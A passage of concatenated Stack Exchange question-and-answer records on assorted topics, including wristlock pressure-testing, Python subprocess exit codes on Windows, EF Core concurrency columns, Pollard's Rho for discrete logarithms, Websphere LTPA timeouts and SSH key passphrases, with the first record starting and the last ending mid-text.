simply need to provide an answer that is useful to the person asking the question (and presumably anyone else who might have the same or a very similar question).\nThe best way is footage and studies. Luckily for you, there's a pretty big world of joint manipulation on video, and there's also a lot of police and security testimony about which ones work and under what conditions. Pressure point work is much more iffy and full of chicanery, but find the best evidence you can.\nSecond, describe, in detail what your experience is making the technique work or where it doesn't. People can compare it to their own experiences, and\/or try it out themselves and see if that works for them.\nYou don't have to make anyone accept your answer. But a good answer will at least provide sufficient information that people can apply it or have directions to research to learn\/apply it in their future.\nIf you can make techniques work reliably under stress, it doesn't matter what anyone else thinks. They can try it out or not.\nAnswer: Specific Approaches\nPlenty of methods exist for proving the efficacy of techniques.\n\nWhen I looked into entering such competitions myself for example Judo bans these techniques and BJJ does not permit them for low grades (below blue belt). \n\nSo go to a BJJ gym, instead of entering a competition, and try it on the blue belts there. As the question in question notes, you might not get a friendly response if you don't tell them you're liable to wristlock them. But there should be at least one blue, purple, brown, or black belt willing to let you try. Bringing a camera seems a bit much until you've been training there at least a few months, but you can still prove it to yourself.\n\nOther styles of Jujitsu also seem to have this approach. UFC style MMA permits these techniques but as this is practiced without a gi and also permits striking techniques opportunity for wrist locks would be minimal and in any case I see no reason to risk concussion over this.\n\nIt's not clear to me what a gi has to do with it. Combat SAMBO might be an option if you absolutely need a gi while allowing strikes, but you'd have to check their rulesets to see if wristlocks are allowed. But if you're saying that allowing strikes makes opportunities for wristlocks minimal, then I'd say you're already in major agreement with many of your interlocutors.\n\nMost of the people on this site seem to be in a different country (I am in the UK) so we can't meet in order to film sparring match.\n\nTry posting on Bullshido.org; they have members all over and at least used to have a philosophy of meeting up for things like this.\nThe General Problem\nThe generalized issue here, at least for me and I believe a few others of similar mind, is that we encourage pressure-testing techniques not for us in the context of discussion, but for anyone's own practice. \nI trained wristlocks weekly for about nine years in a context relatively similar to yours. I catalogued the various kinds, I tried them against \"resisting\" but generally compliant partners much as you describe in your own practice, I taught them. I still believe there's a place for wristlocks, but I see their role as relatively minor compared to other skills, and their reliability for purposes such as throwing or whole-body control to be more limited than most of their proponents admit. I discovered these things through pressure-testing these techniques and others and I think you might find that same process useful.\nThe specific issue that I think you are running into (e.g. here and here), is the difference between uke-tori training and actual uncooperative practice. The difference between the two is monumental. Simply put, evidence gained from an uke-tori scenario is not evidence at all, because every element of the interaction is governed by each person playing their designated roles of technique-applier and technique-receiver.\nComment: Regarding uke\/tori training versus uncooperative practice, see [this person's disillusionment with Shorinji kempo](http:\/\/www.bullshido.net\/forums\/showthread.php?t=125236).\nComment: A) that is 100% what I mean when I say compliant training no matter how you slice it. B) if your friend is a noob, then wristlocking him and claiming victory in an MMA context would be...unconvincing\nComment: I would advise sparring with more than just your friend. Let him bring you to class to spar with the other students too.\nComment: The issue with no gi situations as opposed to those where you are wearing a gi is that most of the best wristlocks are defenses against grabs. I'm not going to try to grab a hand in a live fight. Its just not an optimal move. Similarly if my opponent is trying to hit me I would use striking techniques before even trying to grab. In any case, I am not going to risk brain dammage over this.\nComment: The video he links to is an interesting one. There is basically no-one else in shorinji kempo who can do this to this extent but that is not compliant training. My own instructor knew that guy and learned a lot from him which he is passing on. The thing that you don't seem to realize is that this is not at all like aikido training in that you are not expected to 'feel' the correct way to do the technique. Rather you learn the balance breaking methods and then they will work. This guy started at what 9 years old? He was probably only learning locks for 3 years or so starting at 15\/16.\nComment: In any case, I have found out a good friend has started MMA. So it looks like I should be able to show you some wrist locks applied in that context before long.\nComment: I'm going to have to check when he started it's true. If it's too recent then there's no point in posting it. I'll spar with him either way in any case.\nComment: I'll think about it. As I said though so far as I am concerned if I prove my point sparing with some guy and suffer brain damage sparing with another I loose.\nComment: 1) Someone who hasn't sparred with facepunching has no standing to make any claims about their ability to execute techniques in self-defense. 2) I think you may be overstating the brain damage involved in MMA sparring. It's not like you lose 10 IQ points from one light session, or even ten. See http:\/\/martialarts.stackexchange.com\/a\/999\/347\nComment: Sparing with facepunching as you put it is one thing. Full contact MMA is another. Of course I have been punched in the face, I have also been outright winded by a kick and had my shoulder joint wretched. I'm fine with that. I'm just not prepared to risk brain dammage over an argument on the internet. A single strike to the head could result in permanent mental health problems completely defeating the point of self defense.\n","meta":{"source":"martialarts.meta.stackexchange","title":"What is the process by which a technique gets accepted as viable by a community such as SE?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't install ubuntu along windows 7\n\nQuestion: I boot from a DVD the last version of ubuntu 12.04 x64(because i have 8g. of ram) ,hit install Ubuntu ,check Install Along windwos 7(or something like this ,anyway the first option) and the button in the bottom right corner says \"Restart to install\" or just restart...i cant remember.\nSo ,i hit the button than ,the screen goes black ,some proceses are stopped and on the middle of the screen it writes like this \" Please remove installation media and close the tray (if any) then press ENTER: \"\nThe DVD rom opens and i remove the dvd ,close the tray ,pushing enter and the windows is starting ,no instalation ,no file copied to my PC ,nothing.\nComment: are you sure no file is copied? check the disk usage ? type `diskmgmt.msc` in run prompt and press enter to see the details\nAnswer: I been messing with it all day too and I have problems with the Ubuntu Download link on their home page. I tried unsuccessfully to boot from a live USB and tried burning the iso image to CD, and it said something like that the iso image was not valid or something like that. I choose the latter option and downloaded a image from the Bitttorrent link also in the Ubuntu website that I had better luck installing a dual boot machine with win 7 and ubuntu 12.04 today.\nAnswer: Looks like your Ubuntu DVD is corrupt or somehow broken. Verify by using a different Ubuntu ISO.\nComment: How do i do that?\nComment: Follow this: https:\/\/help.ubuntu.com\/community\/HowToMD5SUM\/#MD5SUM_on_Windows\nComment: So...why use a different ISO?\n","meta":{"source":"askubuntu","title":"Can't install ubuntu along windows 7","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"# more to go\" notification text (when typing comments) is not descriptive enough\n\nQuestion: I went to leave a comment on a post just now and had the message \"5 more to go\". It took me a little while to understand what it was referring to but realised it meant characters after a few minutes. Perhaps this could be made clearer? Maybe something like \"Your comment is too short. * more to go\"\nEdit: I've just noticed that before you start typing it says 'add at least 15 chars\", I didn't see that when I'd started typing. Not sure if this is enough or if it need to be clearer. Could just be a case of PEBKAC!\nAnswer: Well, actually it says\n\nenter at least 15 characters\n\nbefore you type anything in the comment textbox, and then\n\n14 more to go...\n\nafter you've typed the first character. It seems fairly clear to me; I've never heard this request before.\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"\"# more to go\" notification text (when typing comments) is not descriptive enough","dup_signals":{}},"subset":"stackexchange"} +{"text":"Incorrect exit code in python when calling windows script\n\nQuestion: I don't seem to be getting the correct exit code from subprocess.call on Windows.\n<code>import subprocess\nexit_code = subprocess.call(['ant.bat', 'fail'])\nprint exit_code # prints 0\n<\/code>\nDoing the same thing on windows seems to return something other than 0\n<code>> echo %errorlevel%\n0\n> ant fail\n> echo %errorlevel%\n1\n<\/code>\nShouldn't the values from both calls give the same value? Am I doing something wrong?\nIn the worst case, how do I check the value of %errorlevel% in my python script?\nUPDATE:\nI tried something like this to get the errorlevel value:\n<code>environment = os.environment.copy()\ncmd = subprocess.Popen(['ant.bat', 'fail'], env = environment)\nfor key, value in environment.items():\n print '%s = %s' % (key, value)\n<\/code>\nHowever I do not see errorlevel in that dictionary (os.getenv['errorlevel'] also fails).\nComment: Your code works for me (on Windows 7). Can you give some more detail? May it be that the problem is in the .bat file itself?\nAnswer: A process exit code and the errorlevel environment variable aren't the same:\n<code>ant.bat:\n\nif \"%1\"==\"batch_fail\" exit \/B 1\nif \"%1\"==\"proc_fail\" exit 1\n\n>>> import subprocess\n>>> subprocess.call(['ant.bat', 'batch_fail'])\n0\n>>> subprocess.call(['ant.bat', 'proc_fail'])\n1\n<\/code>\nbatch_fail will set the errorlevel to 1, but that's no longer available after the shell exits. proc_fail, however, sets the process exit code to 1. The only solution that comes to mind is a wrapper batch file that calls ant.bat and sets the process exit code according to the errorlevel:\n<code>ant_wrapper.bat:\n\n@echo off\ncall ant.bat %1\nif errorlevel 1 exit 1\n\n>>> subprocess.call(['ant_wrapper.bat'])\n0\n>>> subprocess.call(['ant_wrapper.bat', 'batch_fail'])\n1\n>>> subprocess.call(['ant_wrapper.bat', 'proc_fail'])\n1\n<\/code>\nEdit:\nYour update got me thinking about an alternate approach using Popen. You can run the batch file via cmd's \/K option, which will run a command without exiting. Then simply send <code>exit %errorlevel%<\/code> via stdin, and communicate():\n<code>#test errorlevel==1\n>>> p = subprocess.Popen(['cmd', '\/K', 'ant.bat', 'batch_fail'], \n stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n>>> stdoutdata, stderrdata = p.communicate(b'exit %errorlevel%\\r\\n')\n>>> p.returncode\n1\n\n#test errorlevel==0\n>>> p = subprocess.Popen(['cmd', '\/K', 'ant.bat'], \n stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n>>> stdoutdata, stderrdata = p.communicate(b'exit %errorlevel%\\r\\n')\n>>> p.returncode\n0\n<\/code>\nComment: Thank you for that info. So do you think I can get the %errorlevel% value with Popen? Please see my update to the original question. I posted my attempt at using Popen. Can I make that work somehow?\nComment: Thank you that does work. Is there a way to do the same thing without redirecting stdout though? I want to keep printing the output to the console, but removing stdout=PIPE results in all kinds of craziness for me (I sometimes end up having to close the whole terminal window.)\nAnswer: I was able to get the correct behavior by using the batch <code>call<\/code> command, like\n<code>cmd = [os.environ['COMSPEC'], '\/c', 'call', bat_file]\ntry:\n subprocess.check_call(cmd)\nexcept subprocess.CalledProcessError:\n # Error handling code\n<\/code>\n(I used <code>subprocess.check_call<\/code> but <code>subprocess.call<\/code> ought to work the same way).\nIt's also always a good idea to put <code>if errorlevel 1 exit 1<\/code> after every command in your batch script, to propagate the errors (roughly the equivalent of bash's <code>set -e<\/code>).\nAnswer: <code>os.system('ant.bat fail')<\/code> does exactly what you want. It does return the errorlevel.\n","meta":{"source":"stackoverflow","title":"Incorrect exit code in python when calling windows script","dup_signals":{}},"subset":"stackexchange"} +{"text":"Optimizing a 2 parameter distance function on line segments (ACM ICPC Regionals Elim.)\n\nQuestion: This problem is a subproblem of a problem posed in the ACM ICPC Kanpur Regionals Elimination Round:\nGiven 2 line segments bounded by the 2D points <code>(Pa, Pb)<\/code> and <code>(Pc, Pd)<\/code> respectively, find <code>p<\/code> and <code>q<\/code> (in the range <code>[0,1]<\/code>) that minimizes the function \n<code>f(p, q) = D(Px, Pa) + D(Py, Pd) + k D(Px, Py) where \n 2 <= k <= 5, \n Px = p Pa + (1-p) Pb, \n Py = q Pc + (1-q) Pd and \n D(x, y) is the euclidean distance between points x and y\n<\/code>\n(effectively, Px and Py are points on the line segments and the function encodes the cost of going from Pa to Pd through a connecting link of a cost that is k times the euclidean distance)\nSome observations regarding this function:\n\nParallel line segments will always cause atleast one of <code>p<\/code> and <code>q<\/code> to be either 0 or 1\nIntersecting line segments will always cause <code>p<\/code> and <code>q<\/code> to locate the point of intersection of the line segments (the triangle inequality can be applied to prove this)\n\nThe question:\nIn the general case where the lines are inclined and potentially separated, how do we minimize this function?\nComment: I don't understand observation 2. Counterexample: the two line segments form a tall \"X\" with Pa and Pd epsilon-close to each other, and the point of intersection (Pi) at both midpoints. Now stretch the X vertically to infinity. Then D(Pa,Pi) + D(Pi,Pd) >> D(Pa,Pd) = epsilon.\nComment: you should write this in c or c++ !\nComment: @Svisstack - The language used is not important to me, the algorithm is.\nComment: @Svisstack - Would you require a clarification of the question in C\/C++? If so, which part?\nComment: @Steve - you're right. It's a mistake in my observation.\nComment: No problem. Re: your other comment, I think there are many numerical methods for solving this problem. Because this problem is relatively simple, a simpler method may be best. In the competition, how are answers evaluated? What makes a \"good\" answer?\nComment: Answers are evaluated based on satisfying an accuracy constraint (numerically 10^-5 in this case) as well as satisfying a runtime limit (~1s). I've realized that a simple 2D Binary search by using the gradient of the function as the predicate should suffice. @Steve - Do you have any other alternatives in mind?\nAnswer: I think you should be able to take the partial derivatives of <code>f<\/code> with respect to <code>p<\/code> and <code>q<\/code>, set them to 0, and solve for <code>p<\/code> and <code>q<\/code>. That will give you a (local) minimum. If the minimum has <code>0 <= p <= 1<\/code> and <code>0 <= q <= 1<\/code>, you're done, otherwise check the four endpoints (<code>p=0,q=1<\/code>, and so on).\nI'm not positive that this will handle all degenerate conditions, but it should be a good start.\nComment: I mulled over it and saw a couple of sites on function minimization. This is indeed the generic method, but getting the analytical solution to the equation pair df\/dp = 0 and df\/dq = 0 turns out to be really messy. I'm looking for numerical solutions to the problem - possibly using binary search in 2 dimensions or possibly a variant of the Newton Raphson method.\n","meta":{"source":"stackoverflow","title":"Optimizing a 2 parameter distance function on line segments (ACM ICPC Regionals Elim.)","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to write universal optimistic concurrency Timestamp column that works with SQL Server and with Postgresql\n\nQuestion: We need to support both databases: SQL Server and Postgresql. For optimistic concurrency we use a <code>[Timestamp]<\/code> column.\nFor SQL Server this code works:\n<code>public class DbEntity\n{\n ...\n [Timestamp]\n public byte[] Timestamp { get; set; }\n ...\n}\n<\/code>\nIn the database, this field is mapped to:\n<code>[Timestamp] [timestamp] NOT NULL\n<\/code>\nFor Postgresql we need something like this:\n<code>public class DbEntity\n{\n ...\n [Timestamp]\n public uint Version { get; set; }\n ...\n}\n<\/code>\nwithout column in database, because xmin system column used - https:\/\/www.npgsql.org\/efcore\/modeling\/concurrency.html?tabs=data-annotations\nIt is possible to write universal entities that works with both databases? I want to write them once, and do not support 2 applications or 2 branches in source control.\nAnswer: You can use have both properties on your .NET type and vary the EF model configuration based on the provider being used, and ignore the property for the other databases:\n<code>public class Blog\n{\n public int Id { get; set; }\n\n [Timestamp]\n public byte[] Timestamp { get; set; }\n\n [Timestamp]\n public uint Version { get; set; }\n}\n\n\/\/ In the model configuration:\nprotected override void OnModelCreating(ModelBuilder modelBuilder)\n{\n if (Database.IsSqlServer())\n {\n modelBuilder.Entity<Blog>().Ignore(b => b.Version);\n }\n else if (Database.IsNpgsql())\n {\n modelBuilder.Entity<Blog>().Ignore(b => b.Timestamp);\n }\n}\n<\/code>\nComment: It is also possible to make with only one property `byte[] Timestamp`. In this case additionally `Conversion` must be configured: https:\/\/github.com\/alex-t0\/EntityFrameworkCoreConcurrencyTokens\/blob\/single-field\/WebApp\/Db\/AwesomeDbContext.cs.\n","meta":{"source":"stackoverflow","title":"How to write universal optimistic concurrency Timestamp column that works with SQL Server and with Postgresql","dup_signals":{}},"subset":"stackexchange"} +{"text":"Difference between spark standalone and local mode?\n\nQuestion: What is the difference between Spark standalone and Local mode?\nComment: Possible duplicate of [What is the difference between Spark Standalone, YARN and local mode?](http:\/\/stackoverflow.com\/questions\/40012093\/what-is-the-difference-between-spark-standalone-yarn-and-local-mode)\nComment: Yes question is duplicate but answer is not. That answer was not clear to me\nComment: please look at [this](http:\/\/stackoverflow.com\/a\/40013023\/647053) This question is possible duplicate.\nAnswer: Spark standalone is a resource manager which can work on a cluster. It is simply the built in resource manager as opposed to an external one like yarn.\nSpark local runs without any resource manager, everything runs in a single jvm (you can decide the number of threads). This is aimed for testing locally.\nComment: In addition to that.. you can use local mode for the development purpose where you do not want to eat up the cluster resources and looking for the faster execution time during unit testing or debugging.\n","meta":{"source":"stackoverflow","title":"Difference between spark standalone and local mode?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is PGP suitable for encrypting webservices?\n\nQuestion: I would like to know if I can use of PGP to ensure SOAP webservices confidentiality?\nI don't want use SSL, it's kind of slow mechanism to make a tunnel for high throughput data transaction. \nI though cypher data using a symmetric key, the key will be encrypted to by a asymmetric public key. And push the message in the network, just the intended receiver can read it. \nIs it a good fair pattern for web services?\nAny help will be greatly appreciated.\nRegards\nComment: Remember the old advice when it comes to security: \"Don't roll your own!\"\nAnswer: SSL will be faster than SOAP+PGP. Cryptographically, both SSL and PGP are hybrid systems which use public key cryptography to protect symmetric session keys. In practice, SSL has been tuned on the client and server side to do what it's doing quickly, PGP hasn't been optimized for this case. And you'll have to figure out your key distribution and trust mechanism if you roll your own PGP method.\nDoing your own encryption will have the advantages of protecting it from the usual cases - MITM proxies, accelerator decryption.\nWithout knowing more about your app, it's hard to say, but in most cases, it's not worth it to go your own way. SSL provides pretty darn good security for the average application.\nComment: I am just afraid of the tunneling\/bidirection effort in SSL.\nComment: And would like make perplex a hacker if he succeed breaking our security network. Even he get access to the message, he can't be sure decyphing it correctly, 'cause in all cases the webservice will output a response tuple : cypher and the encrypted session key or a misleading key whether he is recognized in our identity\/user manager.\nComment: I'm beginning to feel two or more of us don't fully understand the question.\nAnswer: PGP\/GPG is generally not used for web services. It relies on anyone communicating to have the public key of who they're communicating with. In web services this generally isn't guaranteed. So depending on the type of service you're providing this might not be ideal. \nIf you're trying to only provide services to a select group of people then you'd have to make sure you have a keyserver set up, all users would have to generate\/have PGP\/GPG keys, all users would have to upload those keys to the keyserver, and your application would have to provide means to configure which keyserver to use. \nIn my opinion it's not worth the overhead to use PGP\/GPG instead of SSL\/TLS. Any kind of slowness you might think SSL\/TLS has is made up with ease of use and accessibility. And in all honesty, it's really not slow. There's a reason why most applications use it for web-based security. \nStraight from the SOAP Wikipedia Page\n\nSOAP may also be used over HTTPS (which is the same protocol as HTTP at the application level, but uses an encrypted transport protocol underneath) with either simple or mutual authentication; this is the advocated WS-I method to provide web service security as stated in the WS-I Basic Profile 1.1.\nAnswer: SSL is already included in most libraries nativelly, so the difference between a plain text webservice and the SSL version is negligible in terms of development on both sides.\nIf the client makes use of persistent connections or reuses the SSL session, the negotiation between client and server is even lighter and faster.\nThe authentication proccess is easier by using a well-known Certificate Authority, so there is no need to exchange keys.\nAlso, there are SSL-accelerators which use hardware specific components to reduce CPU load.\n","meta":{"source":"security.stackexchange","title":"Is PGP suitable for encrypting webservices?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pollard's Rho Method\n\nQuestion: I can't get my head around Pollard's Rho Method for solving discrate log problem \nI have read in a book:\n\nThe basic idea is to pseudorandomly generate group elements of the\n form \u03b1^i \u00b7 \u03b2^j\n\nSo,what are i and j\n\nWe continue until we obtain a collision of two elements, i.e., until\n we have\n \u03b1^i1 \u00b7 \u03b2^j1 = \u03b1^i2 \u00b7 \u03b2^j2\n\nWhy does finding a collision mean that we have solved the problem??\nI understand Pollard's Rho Method for factorization ,but I can't see how it's similar to Pollard's Rho Method for solving discrate log\nAnswer: \nWhy does finding a collision mean that we have solved the problem?\n\nIf we find a collision:\n$\\alpha^{i1} \\cdot \\beta^{j1} = \\alpha^{i2} \\cdot \\beta^{j2}$\nthen we know that:\n$\\alpha^{i1-i2} = \\beta^{j2-j1}$\nAnd so, if we know the order of the group (which we generally do), then we can compute $({i1-i2})^{-1}$, and so, we have:\n$\\alpha = \\beta^{(j2-j1) \\cdot ({i1-i2})^{-1}}$\nTada, we're done.\n\nI understand Pollard's Rho Method for factorization ,but I can't see how it's similar to Pollard's Rho Method for solving discrate log\n\nActually, the similarity isn't in what you do when you find a collision, it's a clever way of searching for collisions without using a huge amount of memory. \nHere's that idea behind the Rho method: if we designate $F^n(x)$ as the function $F$ iterated $n$ times, for example, $F^4(x) = F(F(F(F(x))))$, and $F$ as a finite range of size $\\lambda$, then $F^n(x) = F^{2n}(x)$ for some $n$. In addition, if $F$ is a random function, then $n$ will (with good probability) be $O(\\sqrt{\\lambda})$. This allows us to search for a collision with a small amount of memory (and at a constant cost factor over more obvious techniques that do use a table for $F$ values).\n","meta":{"source":"crypto.stackexchange","title":"Pollard\u2019s Rho Method","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to replace a string in a column based on the value of another column?\n\nQuestion: I have this dataframe:\n<code>df = pd.DataFrame([['US123','1111'],\\\n ['CA456', '2222'],\\\n ['US123', '3333'],\\\n ['US123','4444'], \\\n ['CA456', '5555']], columns=['ID', 'Notes'])\ndf\n<\/code>\n\nThe desired output is:\n\nWhat is the best way to add string <code>; CA<\/code> to column <code>Notes<\/code> when the value in column <code>ID<\/code> starts with <code>CA<\/code>? Thank you!\nAnswer: You may use <code>DataFrame.loc<\/code>, that'll change column <code>Notes<\/code> only where needed, based on the condition on the <code>ID<\/code> column\n<code>df.loc[df['ID'].str.startswith('CA'), 'Notes'] = df['Notes'] + '; CA'\n<\/code>\nAnswer: We can do <code>str.extract<\/code>\n<code>df['Notes'] = (';'+df.ID.str.extract('(CA)')[0]).fillna('').radd(df.Notes)\ndf\nOut[292]: \n ID Notes\n0 US123 1111\n1 CA456 2222;CA\n2 US123 3333\n3 US123 4444\n4 CA456 5555;CA\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to replace a string in a column based on the value of another column?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Websphere Liberty session timeout\n\nQuestion: I am using websphere liberty. I need to set the session expiry for my web application to value t. What value should be set for LTPA expiry? Since LTPA expiry time start from login, where the session expiry time is counted from last activity\nAnswer: LTPA timeout is fixed, so if you want LTPA expiration to happen less often you can set it to typical working hours of your users e.g. 8h.\nYou can set it in the <code><ltpa><\/code> entry in <code>server.xml<\/code>.\n<code><ltpa keysFileName=\"yourLTPAKeysFileName.keys\" keysPassword=\"keysPassword\" expiration=\"480\" \/>\n<\/code>\nIf you just want to logout user when the session expires use the following config element: \n<code><webAppSecurity logoutOnHttpSessionExpire=\"true\"\/>\n<\/code>\nMore details can be found here: Customizing SSO configuration using LTPA cookies in Liberty\nComment: Setting LTPA timeout to 8h irrespective of session timeout - even if session expires, a new session will be created and the user will never log out until 8 hours.\nComment: @HiteshBajaj - What is your actual problem? LTPA is fixed, session timeout is inactivity , so you can have session lasting for all day if user will be constantly clicking. If you want to logout user when the session expires use the `logoutOnHttpSessionExpire=true` setting.\nComment: consider a scenario, where LTPA timeout is 6 hours and inactivity timeout is 2 hours.\nNow the user signs in, LTPA is generated. The user continues to use the website for 6 hours. The session is not inactive at this stage, but the LTPA token expires and the user is redirected for fresh authentication. (The session is not destroyed, but fresh authentication is required). How to deal with this.\nComment: @HiteshBajaj - I've already written that - if you want to avoid expiration of LTPA set it to very long value (12h), so it doesnt expire for the whole user working day. It is not possible to by pass user reauthentication when LTPA expires, unless you are using BASIC auth (which unfortunately prevents logout) or some sso mech like SPNEGO (which performs reauth behind the scene).\nComment: thanks for your reply. I intend to logout session honoring the session inactivity time specified. I want to somehow bypass LTPA expiry(by refreshing the token before it expires). is there a way?\nComment: @HiteshBajaj , no there is no way to refresh LTPA token, other than I've already pointed.\n","meta":{"source":"stackoverflow","title":"Websphere Liberty session timeout","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bags and non-standard evaluation\n\nQuestion: What can internally be happening here? Is the evaluator just messing with us and going non-standard because it's a <code>Bag<\/code>? Or am I just not seeing how something like this could be done in Mathematica?\n<code>AppendTo[$ContextPath, \"Internal`\"];\n\nIn[19]:= ClearAll[x, y];\n{x, y} = {Bag[{1, 2, 3}], Bag[{4, 5}]};\n<\/code>\nHeads are\n<code>In[21]:= Head \/@ {x, y}\n\nOut[21]= {Bag, Bag}\n<\/code>\nBut they are just a head, no depth. Depths \n<code>In[22]:= Depth \/@ {x, y}\n\nOut[22]= {1, 1}\n<\/code>\nHowever, they are different. I take their second elements, or I print them in <code>InputForm<\/code>\n<code>In[23]:= BagPart[#, 2] & \/@ {x, y}\nInputForm \/@ {x, y}\n\nOut[23]= {2, 5}\n\nOut[24]= {InputForm[Internal`Bag[{1, 2, 3}]], InputForm[Internal`Bag[{4, 5}]]}\n<\/code>\nAnswer: This is not related to evaluation. <code>Internal`Bag<\/code>, like many other special types, is an atomic object. You can verify this using <code>AtomQ[x]<\/code>. This is despite its <code>InputForm<\/code> suggesting a structure. \nThis is no different from how <code>Graph<\/code>, <code>Rational<\/code>, <code>Complex<\/code> or <code>SparseArray<\/code> behave. (Though for <code>SparseArray<\/code>, most list manipulation functions are implemented, so it's much more difficult to notice that it is atomic).\n\nA similar example using <code>Rational<\/code>:\n<code>In[206]:= rats={1\/2,2\/3}\nOut[206]= {1\/2,2\/3}\n\nIn[208]:= Head\/@rats\nOut[208]= {Rational,Rational}\n\nIn[209]:= Depth\/@rats\nOut[209]= {1,1}\n\nIn[210]:= FullForm[rats]\nOut[210]\/\/FullForm= List[Rational[1,2],Rational[2,3]]\n<\/code>\nComment: I am starting to hate to vote for your answers because I will never catch up, but their quality compels me. +1 *yet again*\nComment: Actually, I gave the wrong link. This is the one I meant: http:\/\/stackoverflow.com\/questions\/4301833\/new-graph-in-mathematica-8-0\/4356488#4356488, and also I share the point of @WReach which he expressed here: http:\/\/stackoverflow.com\/questions\/7363253\/object-oriented-mathematica-programming\/7379002#7379002\nComment: I would make a distinction between `Graphs` and other objects. For most atomic objects in the past, it was possible to deconstruct and reconstruct them by using their `InputForm` (`FullForm`), the feature which I consider essential. This plays well with immutability. For `Graph`-s, a decision was made to introduce mutable state (properties), and their `InputForm` is deceiving. I dislike this feature, and also think that one should distinguish these two situations. You are certainly well-aware of this discussion: http:\/\/stackoverflow.com\/questions\/5964469\/which-objects-are-atomic-in-mathematica\nAnswer: I think <code>Internal`Bag<\/code> is a monolithic object which is only constructed using the <code>Bag[list]<\/code> syntax. Note that the same is true for <code>Graph<\/code>:\n<code>Graph[{1<->2,2<->3}]\/\/Head\n(*\n==> Graph\n*)\nGraph[{1<->2,2<->3}]\/\/Depth\n(*\n==> 1\n*)\n<\/code>\nAlso note the output of the objects when typing directly in the kernel:\n<code>Internal`Bag[{2,3}]\n(*\n==> Internal`Bag[<2>]\n*)\nGraph[{1<->2,2<->3}]\n(*\n==> Graph[<3>, <2>]\n*)\n<\/code>\nEven <code>FullForm<\/code> doesn't give more information, which shows that on the Mathematica expression level that's all there is.\nComment: It is not that surprising that `FullForm` is broken with `Bag` since `Bag` is not really meant for user consumption..\nComment: @Szabolcs: But `Graph` is definitely meant for user consumption, and it shows exactly the same behaviour.\nComment: Regarding `Graphs`, see my comment below @Szabolcs's answer.\nComment: Of course, I just meant that the edges are not as polished as for the other types, e.g. `FullForm` on `Graph` does work even though it's atomic (but pattern matching doesn't --- while it works for older types like `Rational`)\nComment: Maybe it's a version thing; as I've shown in my post, `Graph` for me shows the exact same behaviour for `FullForm` as `Bag` (parameters showing up as ``).\n","meta":{"source":"mathematica.stackexchange","title":"Bags and non-standard evaluation","dup_signals":{}},"subset":"stackexchange"} +{"text":"What purpose does an SSH private key passphrase serve?\n\nQuestion: Let's say you generate an SSH RSA key pair with <code>ssh-keygen -t rsa -b 2048<\/code>. You'll end up with a public and private key.\n\n<code>id_rsa<\/code>\n<code>id_rsa.pub<\/code>\n\n<code>ssh-keygen<\/code> will prompt: <code>Enter passphrase (empty for no passphrase):<\/code>\nMy understanding is that <code>id_rsa<\/code> will get one prime and <code>id_rsa.pub<\/code> will get another prime. What purpose does the passphrase serve? Is the private key locally encrypted with the passphrase?\nI notice that the <code>id_rsa<\/code> file length is a lot longer than that of <code>id_rsa.pub<\/code>. Is this a byproduct of encryption? Is there more encoded data?\nComment: \"My understanding is that id_rsa will get one prime and id_rsa.pub will get another prime.\" That is incorrect. `id_rsa.pub` is the public key and `id_rsa` is the private key. The public key contains the encryption exponent and the modulus. Either of the primes can be used to compute the private key from the public key so they must both be kept secret.\nComment: This answer explains what's in the private key: https:\/\/crypto.stackexchange.com\/a\/31810\/92165.\nAnswer: It's an encryption passphrase, and serves as an additional protection against an attacker who compromises your PC's data, buying you some time after the compromise to revoke all your key authorizations.\nIf, for instance, your laptop gets stolen, and it is running, it is logged-in, or it lacks local encryption, your attacker would, in the absence of a key password, immediately be able to pivot into all SSH servers your laptop is in the <code>authorized_keys<\/code> of. (The <code>HashKnownHosts<\/code> directive was introduced in March 2005 to make this pivoting process less trivial, but one's shell history, Git repositories, etc. can still be mined for destinations.)\nIt does not serve as any extra \"authentication\", since I believe\u2014other than timing\u2014there's no way for the server to even know that your SSH client happens to use an encrypted keystore. (Unless, of course, your IT administrator is being creative with RMF and is claiming to have implemented \"two factor authentication\" by mandating SSH keys be encrypted at rest...)\nComment: As an informal aside, it looks like [at least as of OpenSSH 7.7](https:\/\/www.latacora.com\/blog\/2018\/08\/03\/the-default-openssh\/), the \"protection\" provided actually kinda sucks. And it sucked a *lot worse* if you generated your key with OpenSSH 6.4 or older, or generated an RSA key without using the `-o` flag. \nAnswer: \nWhat purpose does the passphrase serve? Is the private key locally encrypted with the passphrase?\n\nThe passphrase is derived in a symmetrical key used to encrypt the private key. It can act as a client-side (not the best) second authentication factor (the first one being the possession of the private key file), and to protect the confidentiality of the secret key if it somehow leaks, for example from an unencrypted backup.\n\nI notice that the id_rsa file length is a lot longer than that of id_rsa.pub. Is this a byproduct of encryption? Is there more encoded data?\n\nThe public key is also appended to the private key in the <code>id_rsa<\/code> file. You can recover the public key file with just the private one.\nAnswer: \nMy understanding is that id_rsa will get one prime and id_rsa.pub will get another prime.\n\nNot quite. The public key has a modulus $r$ and an exponent $e$. The private key has the same modulus $r$ and an exponent $d$. They are chosen so that for any $a\\leq r$, $$(a^e)^d\\equiv a (\\mod r)$$\nIt is possible to deduce $d$ from $e$ (and vice versa) if one knows the prime factors of $r$. We hypothesize that this is the only way of doing it. Since in general it is easy to factorise something that has lots of small prime factors we like to make the prime factors of $r$ as large as possible. Frequently this is described as making $r$ a product of two primes but this is by no means necessary. For example, in implementations where large-number modular arithmetic is much more efficient when the modulus is (say) just under a power of $2$, an implementor could choose to have a third, small prime to get $r$ into that form.\n\nLength of keys\n\nWhen creating the keys you can choose one of the exponents to be more or less anything you like, and then deduce the other one from it. In particular, you can choose one of them to be very small indeed, since the time taken for exponentiation is affected by the size of the exponent and the number of $1$ bits in it. $3$ and $65537$ are popular choices. Obviously such a short exponent would be easy to guess, so for this reason it is the public key that can benefit from this abbreviation - which, remember, is not mathematically necessary but merely a convenience for the sake of implementation.\nSo if this is done, the public key (with a very short exponent) will be practically half the length of the private one.\n\nThe passphrase\n\nThe paraphrase is of no great cryptographic interest. Its sole function is to say \"Even if you 